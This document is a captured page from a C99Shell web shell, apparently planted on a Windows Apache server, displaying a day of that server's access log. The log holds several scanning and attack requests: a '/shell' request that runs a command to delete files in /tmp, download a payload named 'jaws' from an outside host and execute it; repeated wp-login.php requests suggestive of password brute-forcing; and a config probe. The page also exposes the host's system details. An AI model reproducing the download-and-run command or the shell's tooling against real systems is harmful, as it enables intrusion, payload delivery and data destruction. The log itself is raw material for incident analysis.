!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 5.02 GB of 239.26 GB (2.1%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.11.14.log (1.16 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
45.8.165.112 - - [14/Nov/2022:00:00:13 -0500] "-" 408 -
45.8.166.207 - - [14/Nov/2022:00:00:14 -0500] "-" 408 -
172.22.2.4 - - [13/Nov/2022:23:58:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Nov/2022:23:59:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45717
94.102.61.10 - - [14/Nov/2022:00:02:14 -0500] "GET / HTTP/1.1" 200 319
185.119.81.104 - - [14/Nov/2022:00:02:39 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [14/Nov/2022:00:02:40 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [14/Nov/2022:00:04:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Nov/2022:00:04:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [14/Nov/2022:00:05:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
74.82.47.23 - - [14/Nov/2022:00:05:38 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [14/Nov/2022:00:04:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Nov/2022:00:06:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:00:05:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
201.245.192.253 - - [14/Nov/2022:00:07:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [14/Nov/2022:00:08:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
181.56.45.74 - - [14/Nov/2022:00:08:41 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/psShlwBYnDsE6DlYBFI9WkMOgO/OxoMo+H7aySiImMDobPGK70L5n&y=U2FsdGVkX1+dApURW3vhztFSy6BLWaLgIQGUry90XZmdEezmaIviNSr5prAn0eFS HTTP/1.1" 200 30
216.245.221.92 - - [14/Nov/2022:00:09:02 -0500] "HEAD / HTTP/1.1" 200 -
181.56.45.74 - - [14/Nov/2022:00:09:08 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19wHXF9qN7E0SfgOqIgGd3c3fACizjN0o19UbmrV/gXcf6WUihSr1L0ukvaDmgZGlpnzbyR2OqunD3KSIH5eWOg4K6wYLFbuVd9dUbVTcyUrI+YCDBpkpTxzscC6rDZD3byUNFvTppkL6/9dCAp1rMi1UO6+nalYUX38D3fHe14yaGBFH28KkjLsE4w6ifbKMt06Qs9gpxZq6f3lSJgvUz42fgldDWRBIxeqhs78OYkwxsBRtNM6BDtiUqVLQn8CYNg0yD9XHjsXw==&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 26
181.56.45.74 - - [14/Nov/2022:00:09:08 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19qih0L22Bkq9DTyGM98TZon1E8vdL2Xkk7nYK9PJnHQ6mqBphQCl9VQov44hf6utumdvYGRi6bZRBM0e98lyWcIonur53r8fvt05NMW9RhU6e+PdpcSi421hzK/jGjdUtCTpCPTnjz2JSPo5Oq70lCHwpSamKbwG93wTbIbwRO+QrLfpSiM4NEdtV3d02Hw/1BMtZNXWoAi02jtGmkwQtdgLwrLFAGLxYLEJUlfMgom5ZKdijBnSeyKI5IuPSDHjgzr1KzD49du2ZN5YiZzWw/l6NRWElWV0HCgfv3nkWaV42XNdEYRP/NeZvLvs4Rtvf9QN//1r87+DppB4mkpWW00QTBtfCub995BCxX5k58v8mFZ4+RZMakRF6s9HfBRlf7AdhpIfsRyNnStCiXC5kGk8SbhFMrtgDzOxUipgoreGoP1gXpwunQr5aw9lZFhUQQYEJ50PlsNGa+6r7fwRUW1l9rDXOVgaJitmwonOt3vcbEUrxXFa5TRuFlFA5p1dOihWTfrb28/iEbN6HPZ0q2bQAeEFASnG/hPH9RZbJ09eN3/3I9o5kOEU3iWwZWEy+WOu2K/UFwn1mVo0Znw3Pk3eFQ6zDbLBqUjZzXAiIlsGwhCo43X1ccej4613Ec/8XCLF5y+pQc9e1ZUop7u82r2ItLv4IhWx4MPrCdVpl/058GkDKKZTbI72ltrenwLkj5mOgi1qO3qjPRGbITjNPtr+4j0CI6wETWyv8ahCzhkaUs5oe8maBdCmV3gpP7mQ5o4c9l6D4Z67aUnby0sRAU9lW1FGKdCulRkRDYU/BM6SsZ9UGW2f80GE6VQmuV7JnECokOW1b09SuvhqH2e0KOgeT9QkEHXjp5ZGIcNmUUU64N58xF4WHqzez+Vfx4WHQUTGnnHmCk9nGjuCnyi6lZvfSHFhhOUmgO1oikvQQEhWaQpP/tVxihmD+pn6vZa6EoEQSG3ru8p1Hzk0Od0t0iUM7eJAh6ibsg8kCIFQ3oHYSOKdOvIMtROH4vMPkPDl6IC9D9CpfdLSS8TXx9KHUG+8viWdCiL6njtwtXL8PEk9hINAHtbpbfiA8JbTjkFNlgag/FBZMkbnA1xfpQIU/BdDAXTrHSsh3MdrelS3KgKR4kdqJrQiGZ/IJvrpsy0zPlGZjed32yT6ihsuNRbGyD5grLaS+hboz2KMSaCCVNXo9mXf/jQwj2WSuP34kOIgDHfX1ZP+y2ZNDdrUXmKZ5R0/a2PaBqjNv+am8hzis1LM4uHUZPSNohNx2t6pHW7hjb5dt5gj/LFgdgMWlbaDJUspd8vt4G/UWlmYThQBqTan5oyilHZt0/ywbcY9QJnIQ2ZrXHy8RwJ01QnYmw2DFjSoGtsdewfQObJebn/bz8slVxFEUg+dJ+4NZzjgVevD1cO6H7JiB+3SFbqb+kZ7mj17TnhnzXcQQdu1e7Ov9uxCOzvTN2gbExcWeOcp3jpUvMHOoUNRFwKeLFiqDEd49sANgtPrqrFPN+9H9rVY/4oGAz23+XZfIPmoTsANwya4Z+KGwfD+XBvO9s6qzDQFLLQttgydTWg8zQD1he1kW05+f2k6D1Jz1hAGGzYadvc/2jKow/cMH6uq23MaR9lhzwRfVU884toNM/kw46RLa9AYoyw42jZ5NGVfoYn5Rq+m77kzGGh/Z0+tFnStfW1k3FlWoHjwi3meB4bDieC62BiF3VmZNnZ0o/IRczXlGLccNQETTF17UYz1LE76+juUOY8ftZu5eOlzMtYAe1JjDJK7v4dm4xgGooOOLiDF03bCAVAXbATF+/MwDq86nWESuhIN/5AUNcV6MQrEt+d8pYB8Rs87+CKS2TK7INxw89+y8PdczobUHqQ2U7ENMAoMmHrHnaRZwvF6hiXPchBx25vKebWE1VfYN/jFSywfY4T4SeO0ctf0ihnRZX1WKnMSGxre57gZTD36e5y/q2SsL+P59hRlMJhASwX8jYTNtG+UakGRtBMKL40KLpnoIY4LfiX5XIzWcdfRuia0faBo65Xp0gEuX9zk5I5bMIdm80bO3FZ+iGAs0Hb0Jj1xxttPwYbSvr66OTUNiXiCsguQhRWl6JgfQ+RMZa9lGJb8rIFDHzWLX+a7WAD9V/8IQl1ImMkIpW6K3M0mIE8Cp2Sdi3gI0GeHqL7plViK0L6bcK6oymF9cpmxQKwT4otNI67pXhHdTzgbG1d2IFw8IB+AFM0hjoIWpDH1c7qggXZ9NiFj0ASrwPFmTKXfM9Ik6CL4dH/YK8asXTGeSU8VXYo10v/e35CVqqN2WlHgsO1sCZmUA9izVT5DaCq+qUShTWUU3HoqlT4ytiK9jcKX++Yze5Qhze+cMZ9Mx+zuUMr1EF1XGDVVr1qhBF/UmVpVNlOY/Gi90+9beAEjh4Ro0znHJAYskvyN3Olo6wu2lYNw8ITeg7B8sjLH0wcsMZhZC1/zSiZG/W4PRehrJg7qHywHq+94AKtepZKk4njLsSPVO923x160DEfSaqTMzOyR3JCk+so7MSzdpFy4kBKmP565MG9zyDMmzdpXz8&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 26
181.56.45.74 - - [14/Nov/2022:00:09:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+pbTgH6sonlxlQ2UNL4ar7g/grYjbO1Csa/XSS5oHbM/w/7zT8fNtSVB75Nf8qkUsPekdUHQS5LUDpqw94JKYPLfGsYeoRSB0EyA6aaAY9M1OwPXHsZ6FnLUHogIRjetni7vRUSBctqXyvzmEVg1Fsiz9CFCVqZhQ=&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 26
181.56.45.74 - - [14/Nov/2022:00:09:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+9PYK43rkRgGDv3CjhRU5AxGMdY+bd75NDlLPuV+eLNFHRoDWYe1QkBnP5cyH36FObe6jzhBQpM1V9EY/4OFORyxSbVIzzert7ih7RwGefVjfNVbwQ7Imn14Q4d47BBMnsE0eHVFC+Mwd3L8+ETDeu6c6GEsEEEHE=&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 26
181.56.45.74 - - [14/Nov/2022:00:09:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1//t60JTPX82LL/Q8R3IF1lk9YoQDVYL1Fij1mTcnvA4DFdrwOsUZw2Y3enz9oMxSvZifXH+jziYdS/I0q9sPtTne7bSdBMSdrwR6oUsRA4Aes1OdEo7zk+jullSCL/srgDRhvHp+cJCryRxwwTlRJmfOE7pkmWkKc=&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 26
181.56.45.74 - - [14/Nov/2022:00:09:10 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18A8BOkORuNeaLSId2mbO05dAAzqWbV3xoYzV7k8oy+s78/N6bAdzqsjX7bk8pFhPP5vCCEANWRN11fIL5hjQvOKaoqthmysutQCnDcpNgkGxn8V+03tEOQU1Wwv3x9ZOJb6c3ugFRRacC12BvGjlD4fofl6i3LlXvNDGObiSwv4+N89/vfJaVq1TqDBOq8xe6727wFN/xcsA==&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 26
181.56.45.74 - - [14/Nov/2022:00:09:10 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19jAjQMXPLhWYlgtrAF5kQ7tv9keaa5JQ9H6COCIDN8lpk+GPIwuyNAP/kbkbXVobFSOIXdC9Idc8LvUL56M83k4gjQkdl1NxYk09Mu7P3nsdK+qCCSdWSnNZqAhrK7og7glQEb17i067yIQtAoNWKEZE1On/clJYqlyOXY0PuHeMx0fjdWkvCnIFbGFabjA1wBB63DdPmmOQ==&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 26
181.56.45.74 - - [14/Nov/2022:00:09:10 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+7uwoUOD9YdSE9cEd5g2rIH1azjVykR+4Zosg3xns3iz5/7ThFE+VMvTzFLN2MpaUR8J0OpPC0yW11kDH1DV1vWh+9jD08S3RMxkXHfctlUKRcwm/Eub1dSk/dLy3paf1KM6Ff2LhSgQt81zny5+40HMdXFQXK9zo=&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 26
172.22.2.4 - - [14/Nov/2022:00:10:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:00:11:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54816
181.56.45.74 - - [14/Nov/2022:00:13:28 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18yHZuiMNcpZawDxpFY7Y8zogb2Ir/DO/wAx/qEMmRQdyE98OyG2/rrOG8hZbSfRHqlz0Jk7ABBM/EuXAoFO7yGHWgs2kNT3VA/5QvCULTbd9+ddNHL32MArxz4X3hXbCRYl1djoaR4k4Mopuu6h/r3weHo90q46lmI1Lx8afVa/v0RYmZK4tQbKj+MF7AsTjbmByo/+27fizVIAn59HCED/zQsFoSVGCpHU9+H1Wg9kRdbIO97L4hZafq8L6d03t7VUWFGUew9pg==&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 26
181.56.45.74 - - [14/Nov/2022:00:13:29 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 26
181.56.45.74 - - [14/Nov/2022:00:13:29 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/w/A3PhJ2TdTi+vFybC7sAZuAPc98tLfGtFdvwA3ZI8jOjO0ASq9/TuDRsT6Qb2wpK3s2aQw0a9q3iRVb5aNBbrGkVq0ngaGkxdWv10jHxoplu0q5MgJ6mrqrk4CYAryVXfiviPwxHkjfzpNBV4Hlb7342Z0F5Lbg=&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 26
181.56.45.74 - - [14/Nov/2022:00:13:29 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19MzBYSRhuFix/kquTxBSIJd0fdxtUdlyglunay3X0KQsY7a8nSo+uplsQsxRQO+xGTe+jz9ROxxXuYaxGaQhndO2iTcp4zkM59wYnENOjrHtkeis1JQZ67QpQcgTONRxge4DtnkI0CP1VI1wn0wD/4PGAH/B3iz4g=&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 26
181.56.45.74 - - [14/Nov/2022:00:13:29 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/j34I2svDgszVCpJeMJciDwpfl7DHN415/iNtBut5Uuqs6qOZbEBsAE+Yf5MWEq8M8IQ8FHEm7KFDXgde4NXP5nIT8tVoz2h7dnNkdAFwHljeg7cVSax4/79D+KT/uzdwofxwrWNwTEgcAIUvf1kOVDkFbfWhtl+M=&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 26
181.56.45.74 - - [14/Nov/2022:00:13:30 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19Z7ZQpxBtqPKwcovfNNXhvQyvUzLUpN2fJmUdVrCdf/fClOBpeoKSZ6V3UhCVVYYJ8Wq7kxkfUSE2wXsfmuWMs/yUUM1Y/F3SMgMWhmeAfwv/BgMQFybcgiKhIqJT+hZYWnxGDiGGFytjLzWc4qGFRklVzjonese6IrwbqSLgGxCQVKY/pS3fyS9uBh0l+whVS8Mm8nbWbAw==&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 26
201.245.192.253 - - [14/Nov/2022:00:13:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
181.56.45.74 - - [14/Nov/2022:00:14:00 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX19cu8G1CFZozEb8vGVRVsm3BPWtPmlT/nDbHXe8GcRBJjanweW+FFgaxaSA78HQzS/BQ0NAnwhfbj/GszvzcrRXn03rprv7tsni4lLGhc7R6XH0b6aTQLbCQsupWkY6qOxLqoAPbUgrZg==&u=U2FsdGVkX1/9e4A8tBh0rH8twKjlKP+a5mUM7nBwGg3UBjf3cJO83Gz4ydxkOeB+&y=U2FsdGVkX183WK93prkONbC9htMskgqVqGLR7VwLrakGAAB9GKTgR6ouhJOl0rnK HTTP/1.1" 200 60
216.245.221.92 - - [14/Nov/2022:00:14:02 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [14/Nov/2022:00:14:32 -0500] "-" 408 -
172.22.2.4 - - [14/Nov/2022:00:14:49 -0500] "GET /BLA/boletinlegal/js/zimbraMail/share/model/ZmSettings.js HTTP/1.1" 404 1018
185.119.81.104 - - [14/Nov/2022:00:16:18 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [14/Nov/2022:00:16:19 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
185.119.81.104 - - [14/Nov/2022:00:16:51 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [14/Nov/2022:00:16:52 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
54.39.243.52 - - [14/Nov/2022:00:17:14 -0500] "GET /auambari-deleito-con-sus-sonidos-ambientales-a-los-asistentes-de-fima-2021.html HTTP/1.1" 200 888
172.22.2.4 - - [14/Nov/2022:00:16:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Nov/2022:00:18:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:00:17:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
216.245.221.92 - - [14/Nov/2022:00:19:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Nov/2022:00:21:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43984
201.245.192.253 - - [14/Nov/2022:00:21:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43451
201.245.192.253 - - [14/Nov/2022:00:23:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [14/Nov/2022:00:22:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Nov/2022:00:24:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:00:23:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
54.39.177.173 - - [14/Nov/2022:00:25:24 -0500] "GET /alcaldesa-mayor-lidera-puesto-de-mando-unificado-para-atender-emergencia-invernal-en-inmediaciones-de-la-calera.html HTTP/1.1" 200 1095
172.22.2.4 - - [14/Nov/2022:00:27:18 -0500] "GET /BLA/boletinlegal/explore HTTP/1.1" 404 1018
20.231.101.203 - - [14/Nov/2022:00:26:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61905
201.245.192.253 - - [14/Nov/2022:00:28:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Nov/2022:00:29:02 -0500] "HEAD / HTTP/1.1" 200 -
69.63.184.119 - - [14/Nov/2022:00:29:22 -0500] "GET /prevenir-incendios-forestales-en-la-primera-temporada-de-menos-lluvias-del-ano-es-responsabilidad-de-todos.html HTTP/1.1" 206 1006
87.236.176.221 - - [14/Nov/2022:00:29:38 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Nov/2022:00:28:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:00:30:10 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%201%20del%2010%20de%20Abril%20de%202014.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/Nov/2022:00:28:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
201.245.192.253 - - [14/Nov/2022:00:31:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43984
201.245.192.253 - - [14/Nov/2022:00:31:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43451
201.245.192.253 - - [14/Nov/2022:00:33:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Nov/2022:00:34:02 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.103 - - [14/Nov/2022:00:34:27 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [14/Nov/2022:00:34:28 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
185.119.81.98 - - [14/Nov/2022:00:35:19 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.98 - - [14/Nov/2022:00:35:20 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [14/Nov/2022:00:33:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:00:34:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
38.89.149.84 - - [14/Nov/2022:00:37:11 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+chdestruction.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
201.245.192.253 - - [14/Nov/2022:00:38:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
157.55.39.105 - - [14/Nov/2022:00:38:41 -0500] "GET /portaldeninos/2021/05/21/2070/ HTTP/1.1" 200 109949
216.245.221.92 - - [14/Nov/2022:00:39:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:00:39:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Nov/2022:00:41:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43984
201.245.192.253 - - [14/Nov/2022:00:41:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43451
172.22.2.4 - - [14/Nov/2022:00:40:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55680
194.146.24.107 - - [14/Nov/2022:00:42:34 -0500] "GET /config/getuser?index=0 HTTP/1.1" 404 1018
201.245.192.253 - - [14/Nov/2022:00:43:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [14/Nov/2022:00:44:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:00:45:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Nov/2022:00:46:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
